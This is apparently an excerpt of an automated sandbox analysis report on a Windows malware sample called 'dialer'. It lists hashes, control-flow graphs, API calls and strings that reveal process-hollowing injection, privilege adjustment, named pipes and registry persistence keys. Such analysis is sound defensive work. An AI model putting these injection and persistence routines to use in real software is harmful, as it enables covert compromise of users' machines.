                                                        • Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                        • Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
                                                        • Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
                                                        • Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700
                                                        Function 0000000140001F2C Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 124filememorystringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.1911314276.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000000B.00000002.1911255319.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.1911374527.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.1911435447.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                                        • String ID: .text$C:\Windows\System32\
                                                        • API String ID: 2721474350-832442975
                                                        • Opcode ID: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                        • Instruction ID: 0b364bd3c89a37fdd3fa7b369e4888cbeb1e5b170dc00cf86e963973e9165d3d
                                                        • Opcode Fuzzy Hash: ea51ffa9aeaeb0e2cf226d8574d2fabd87300f6e212f2c78447215b36c46b769
                                                        • Instruction Fuzzy Hash: CC518BB2204B8096EB62CF16F8587DAB3A5F78CBD4F444525AF4A03B68DF38C549C700
                                                        Function 0000000140002BF8 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 40sleepfilepipeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.1911314276.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000000B.00000002.1911255319.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.1911374527.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.1911435447.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                                        • String ID: M$\\.\pipe\dialerchildproc64
                                                        • API String ID: 2203880229-3489460547
                                                        • Opcode ID: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                        • Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
                                                        • Opcode Fuzzy Hash: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
                                                        • Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700
                                                        Function 00000001400021D0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36sleeppipefileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 128 1400021d0-1400021da 129 1400021dd-1400021f0 call 140001b54 128->129 132 1400021f2-1400021fb Sleep 129->132 133 1400021fd-14000220a ConnectNamedPipe 129->133 132->129 134 140002241-140002246 Sleep 133->134 135 14000220c-14000222d ReadFile 133->135 136 14000224c-140002255 DisconnectNamedPipe 134->136 135->136 137 14000222f-140002234 135->137 136->133 137->136 138 140002236-14000223f 137->138 138->136
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.1911314276.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000000B.00000002.1911255319.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.1911374527.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.1911435447.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                                        • String ID: \\.\pipe\dialercontrol_redirect64
                                                        • API String ID: 2071455217-3440882674
                                                        • Opcode ID: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                        • Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
                                                        • Opcode Fuzzy Hash: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
                                                        • Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700
                                                        Function 0000000140002B38 Relevance: 9.1, APIs: 6, Instructions: 58memorysleepCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 148 140002b38-140002b8c GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 149 140002b8e-140002ba1 K32EnumProcesses 148->149 150 140002ba3-140002bb2 149->150 151 140002beb-140002bf4 Sleep 149->151 152 140002bb4-140002bb8 150->152 153 140002bdc-140002be7 150->153 151->149 154 140002bba 152->154 155 140002bcb-140002bce call 140002540 152->155 153->151 156 140002bbe-140002bc3 154->156 159 140002bd2 155->159 157 140002bc5-140002bc9 156->157 158 140002bd6-140002bda 156->158 157->155 157->156 158->152 158->153 159->158
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.1911314276.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000000B.00000002.1911255319.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.1911374527.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.1911435447.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                        • String ID:
                                                        • API String ID: 3676546796-0
                                                        • Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                        • Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
                                                        • Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
                                                        • Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40
                                                        Function 00000001400018AC Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 172 1400018ac-1400018d6 OpenProcess 173 140001901-140001912 172->173 174 1400018d8-1400018e8 IsWow64Process 172->174 175 1400018f8-1400018fb CloseHandle 174->175 176 1400018ea-1400018f3 174->176 175->173 176->175
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.1911314276.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000000B.00000002.1911255319.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.1911374527.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.1911435447.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Process$CloseHandleOpenWow64
                                                        • String ID:
                                                        • API String ID: 10462204-0
                                                        • Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                        • Instruction ID: a864651f2e5c17a125c4a55b2f5ca9b47fcd1256b8d640ad9fe9232b2a40a049
                                                        • Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
                                                        • Instruction Fuzzy Hash: 77F01D7170578192EB56CF17B584399A665E78CBC0F449039EB8943768DF39C4858700
                                                        Function 0000000140002258 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 177 140002258-14000225c call 14000226c 179 140002261-140002263 ExitProcess 177->179
                                                        APIs
                                                          • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
                                                          • Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
                                                          • Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
                                                          • Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
                                                          • Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
                                                          • Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
                                                          • Part of subcall function 000000014000226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
                                                          • Part of subcall function 000000014000226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
                                                          • Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
                                                          • Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
                                                          • Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
                                                          • Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
                                                          • Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
                                                          • Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
                                                          • Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
                                                          • Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408
                                                        • ExitProcess.KERNEL32 ref: 0000000140002263
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.1911314276.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000000B.00000002.1911255319.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.1911374527.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.1911435447.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
                                                        • String ID:
                                                        • API String ID: 3836936051-0
                                                        • Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                        • Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
                                                        • Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
                                                        • Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716

                                                        Non-executed Functions

                                                        Function 0000000140002560 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 296memoryregistryfileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 184 140002560-14000258c 185 140002592 184->185 186 14000273a-140002742 184->186 187 1400026c6-1400026fe GetProcessHeap HeapAlloc K32EnumProcesses 185->187 188 140002598-14000259f 185->188 189 140002748-14000274b 186->189 190 14000297e-1400029a2 ReadFile 186->190 191 140002a74-140002a8e 187->191 193 140002704-140002715 187->193 194 1400025a5-1400025a8 188->194 195 1400026bd-1400026bf ExitProcess 188->195 196 140002751-140002756 189->196 197 140002974-140002979 call 14000175c 189->197 190->191 192 1400029a8-1400029af 190->192 192->191 201 1400029b5-1400029c9 call 1400018ac 192->201 193->191 202 14000271b-140002733 call 1400010c0 193->202 203 1400025ae-1400025b1 194->203 204 140002660-14000268b RegOpenKeyExW 194->204 198 140002919-14000292c call 140001944 196->198 199 14000275c-14000275f 196->199 197->191 198->191 226 140002932-140002941 call 140001944 198->226 205 140002761-140002766 199->205 206 14000279d-1400027ae call 140001944 199->206 201->191 224 1400029cf-1400029d5 201->224 227 140002735 202->227 213 140002651-14000265b 203->213 214 1400025b7-1400025ba 203->214 211 1400026a1-1400026b8 call 1400019c4 call 14000175c call 140001000 call 1400017ec 204->211 212 14000268d-14000269b RegDeleteValueW 204->212 205->191 215 14000276c-140002796 call 14000217c call 1400021a8 ExitProcess 205->215 206->191 235 1400027b4-1400027d6 ReadFile 206->235 211->191 212->211 213->191 221 140002644-14000264c 214->221 222 1400025c0-1400025c5 214->222 221->191 222->191 229 1400025cb-1400025ef ReadFile 222->229 233 1400029db-140002a16 GetProcessHeap HeapAlloc call 1400014d8 224->233 234 140002a5f 224->234 226->191 250 140002947-14000296f ShellExecuteW 226->250 227->191 229->191 231 1400025f5-1400025fc 229->231 231->191 238 140002602-140002616 call 1400018ac 231->238 253 140002a18-140002a1e 233->253 254 140002a49-140002a4f GetProcessHeap 233->254 240 140002a66-140002a6f call 140002a90 234->240 235->191 242 1400027dc-1400027e3 235->242 238->191 259 14000261c-140002622 238->259 240->191 242->191 249 1400027e9-140002827 GetProcessHeap HeapAlloc ReadFile 242->249 255 14000290b-140002914 GetProcessHeap 249->255 256 14000282d-140002839 249->256 250->191 253->254 260 140002a20-140002a32 253->260 257 140002a52-140002a5d HeapFree 254->257 255->257 256->255 261 14000283f-14000284b 256->261 257->191 263 140002624-140002633 call 1400010c0 259->263 264 140002638-14000263f 259->264 265 140002a34-140002a36 260->265 266 140002a38-140002a40 260->266 261->255 267 140002851-14000285c 261->267 263->191 264->240 265->266 271 140002a44 call 1400016cc 265->271 266->254 272 140002a42 266->272 268 140002881-140002905 lstrlenW GetProcessHeap HeapAlloc call 140002a90 GetProcessHeap HeapFree 267->268 269 14000285e-140002869 267->269 268->255 269->255 273 14000286f-14000287c call 140001c88 269->273 271->254 272->260 273->255
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.1911314276.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000000B.00000002.1911255319.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.1911374527.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.1911435447.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
                                                        • String ID: SOFTWARE$dialerstager$open
                                                        • API String ID: 3276259517-3931493855
                                                        • Opcode ID: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                                                        • Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
                                                        • Opcode Fuzzy Hash: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
                                                        • Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741
                                                        Function 0000000140001C88 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 154injectionthreadmemoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 280 140001c88-140001cb8 281 140001cbb-140001cc8 280->281 282 140001e8c-140001e91 281->282 283 140001cce-140001d25 CreateProcessW 281->283 282->281 286 140001e97 282->286 284 140001e88 283->284 285 140001d2b-140001d5a VirtualAllocEx 283->285 284->282 287 140001e5d-140001e60 285->287 288 140001d60-140001d7b WriteProcessMemory 285->288 289 140001e99-140001eb9 286->289 290 140001e62-140001e76 OpenProcess 287->290 291 140001e85 287->291 288->287 292 140001d81-140001d87 288->292 290->284 293 140001e78-140001e83 TerminateProcess 290->293 291->284 294 140001dd2-140001def VirtualAlloc 292->294 295 140001d89 292->295 293->284 294->287 296 140001df1-140001e07 GetThreadContext 294->296 297 140001d8c-140001dba WriteProcessMemory 295->297 296->287 299 140001e09-140001e2e WriteProcessMemory 296->299 297->287 298 140001dc0-140001dcc 297->298 298->297 300 140001dce 298->300 299->287 301 140001e30-140001e4c SetThreadContext 299->301 300->294 301->287 302 140001e4e-140001e5b ResumeThread 301->302 302->287 303 140001eba-140001ebf 302->303 303->289
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.1911314276.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000000B.00000002.1911255319.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.1911374527.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.1911435447.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
                                                        • String ID: @
                                                        • API String ID: 3462610200-2766056989
                                                        • Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                        • Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
                                                        • Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
                                                        • Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700
                                                        Function 00000001400019C4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 102memorycomCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.1911314276.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000000B.00000002.1911255319.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.1911374527.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.1911435447.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                        • String ID: dialersvc64
                                                        • API String ID: 4184240511-3881820561
                                                        • Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                        • Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
                                                        • Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
                                                        • Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300
                                                        Function 0000000140001000 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.1911314276.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000000B.00000002.1911255319.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.1911374527.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.1911435447.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: Delete$CloseEnumOpen
                                                        • String ID: SOFTWARE\dialerconfig
                                                        • API String ID: 3013565938-461861421
                                                        • Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                        • Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
                                                        • Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
                                                        • Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54
                                                        Function 0000000140002A90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.1911314276.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000000B.00000002.1911255319.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.1911374527.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.1911435447.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: File$Write$CloseCreateHandle
                                                        • String ID: \\.\pipe\dialercontrol_redirect64
                                                        • API String ID: 148219782-3440882674
                                                        • Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                        • Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
                                                        • Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
                                                        • Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40
                                                        Function 0000000140001914 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.1911314276.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                        • Associated: 0000000B.00000002.1911255319.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.1911374527.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        • Associated: 0000000B.00000002.1911435447.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_140000000_dialer.jbxd
                                                        Similarity
                                                        • API ID: AddressHandleModuleProc
                                                        • String ID: ntdll.dll
                                                        • API String ID: 1646373207-2227199552
                                                        • Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                        • Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
                                                        • Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
                                                        • Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

                                                        Execution Graph

                                                        Execution Coverage:1%
                                                        Dynamic/Decrypted Code Coverage:94.6%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:112
                                                        Total number of Limit Nodes:18
                                                        execution_graph 29689 225dc67273c 29690 225dc67276a 29689->29690 29691 225dc6727c5 VirtualAlloc 29690->29691 29692 225dc6727ec 29690->29692 29691->29692 29693 225dc643ab9 29694 225dc643a06 29693->29694 29695 225dc643a56 VirtualQuery 29694->29695 29696 225dc643a8a VirtualAlloc 29694->29696 29698 225dc643a70 29694->29698 29695->29694 29695->29698 29697 225dc643abb GetLastError 29696->29697 29696->29698 29697->29694 29697->29698 29699 225dc641abc 29704 225dc641628 GetProcessHeap 29699->29704 29701 225dc641ad2 Sleep SleepEx 29702 225dc641acb 29701->29702 29702->29701 29703 225dc641598 StrCmpIW StrCmpW 29702->29703 29703->29702 29705 225dc641648 __std_exception_copy 29704->29705 29749 225dc641268 GetProcessHeap 29705->29749 29707 225dc641650 29708 225dc641268 2 API calls 29707->29708 29709 225dc641661 29708->29709 29710 225dc641268 2 API calls 29709->29710 29711 225dc64166a 29710->29711 29712 225dc641268 2 API calls 29711->29712 29713 225dc641673 29712->29713 29714 225dc64168e RegOpenKeyExW 29713->29714 29715 225dc6418a6 29714->29715 29716 225dc6416c0 RegOpenKeyExW 29714->29716 29715->29702 29717 225dc6416e9 29716->29717 29718 225dc6416ff RegOpenKeyExW 29716->29718 29760 225dc6412bc 13 API calls __std_exception_copy 29717->29760 29719 225dc64173a RegOpenKeyExW 29718->29719 29720 225dc641723 29718->29720 29723 225dc641775 RegOpenKeyExW 29719->29723 29724 225dc64175e 29719->29724 29753 225dc64104c RegQueryInfoKeyW 29720->29753 29728 225dc641799 29723->29728 29729 225dc6417b0 RegOpenKeyExW 29723->29729 29761 225dc6412bc 13 API calls __std_exception_copy 29724->29761 29725 225dc6416f5 RegCloseKey 29725->29718 29762 225dc6412bc 13 API calls __std_exception_copy 29728->29762 29732 225dc6417eb RegOpenKeyExW 29729->29732 29733 225dc6417d4 29729->29733 29730 225dc64176b RegCloseKey 29730->29723 29734 225dc641826 RegOpenKeyExW 29732->29734 29735 225dc64180f 29732->29735 29763 225dc6412bc 13 API calls __std_exception_copy 29733->29763 29739 225dc64184a 29734->29739 29740 225dc641861 RegOpenKeyExW 29734->29740 29738 225dc64104c 5 API calls 29735->29738 29736 225dc6417a6 RegCloseKey 29736->29729 29742 225dc64181c RegCloseKey 29738->29742 29743 225dc64104c 5 API calls 29739->29743 29744 225dc64189c RegCloseKey 29740->29744 29745 225dc641885 29740->29745 29741 225dc6417e1 RegCloseKey 29741->29732 29742->29734 29746 225dc641857 RegCloseKey 29743->29746 29744->29715 29747 225dc64104c 5 API calls 29745->29747 29746->29740 29748 225dc641892 RegCloseKey 29747->29748 29748->29744 29764 225dc656168 29749->29764 29751 225dc641283 GetProcessHeap 29752 225dc6412ae __std_exception_copy 29751->29752 29752->29707 29754 225dc6411b5 RegCloseKey 29753->29754 29755 225dc6410bf 29753->29755 29754->29719 29755->29754 29756 225dc6410cf RegEnumValueW 29755->29756 29758 225dc641125 __std_exception_copy 29756->29758 29757 225dc64114e GetProcessHeap 29757->29758 29758->29754 29758->29756 29758->29757 29759 225dc64116e GetProcessHeap HeapFree 29758->29759 29759->29758 29760->29725 29761->29730 29762->29736 29763->29741 29765 225dc61273c 29767 225dc61276a 29765->29767 29766 225dc6128d4 29767->29766 29768 225dc6127c5 VirtualAlloc 29767->29768 29768->29766 29769 225dc6127ec 29768->29769 29769->29766 29770 225dc612858 LoadLibraryA 29769->29770 29770->29769 29771 225dc6428c8 29772 225dc64290e 29771->29772 29773 225dc642970 29772->29773 29775 225dc643844 29772->29775 29776 225dc643866 29775->29776 29777 225dc643851 StrCmpNIW 29775->29777 29776->29772 29777->29776 29778 225dc64554d 29780 225dc645554 29778->29780 29779 225dc6455bb 29780->29779 29781 225dc645637 VirtualProtect 29780->29781 29782 225dc645671 29781->29782 29783 225dc645663 GetLastError 29781->29783 29783->29782 29784 225dc6ad6cc 29789 225dc6ad6dd _invalid_parameter_noinfo 29784->29789 29785 225dc6ad72e 29790 225dc6ad6ac 6 API calls 